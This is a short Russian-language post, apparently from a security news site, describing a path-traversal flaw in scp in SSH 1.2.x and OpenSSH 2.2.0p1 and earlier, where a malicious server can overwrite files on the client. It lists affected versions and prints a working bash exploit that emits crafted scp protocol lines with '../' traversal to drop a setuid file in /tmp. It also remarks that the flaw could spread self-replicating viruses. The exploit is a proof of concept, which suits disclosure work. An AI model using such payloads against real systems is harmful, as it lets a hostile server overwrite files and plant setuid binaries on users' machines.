Когда-бы не использовался scp для передачи файлов с удаленной машины на твой комп, scp-сервис может вызвать затирание случайных файлов законной scp инфой. Это, конечно, не есть «сквозная прореха» в защите, но, типа, эта лазейка может быть использована для распространения саморазмножающихся вирусов через компы 3-х лиц 🙂

Системы уязвимы:
SSH 1.2.xx
OpenSSH 2.2.0p1 и пред.

Системы не уязвимы:
Data Fellows SSH package

Код эксплоита:
Эксплоит в конечном итоге создает на удаленной машине файл, названный /tmp/ScpIsBuggy с setuid-привелегиями, который содержит 200 байт мусора.

#!/bin/bash
echo «D0755 0 ../../../../../../tmp/nope»
echo «D0755 0 ../../../../../../tmp»
echo «C4755 200 ScpIsBuggy»
dd if=/dev/urandom bs=200 count=1 2>/dev/null
dd if=/dev/zero bs=1 count=2 2>/dev/null

Оставить мнение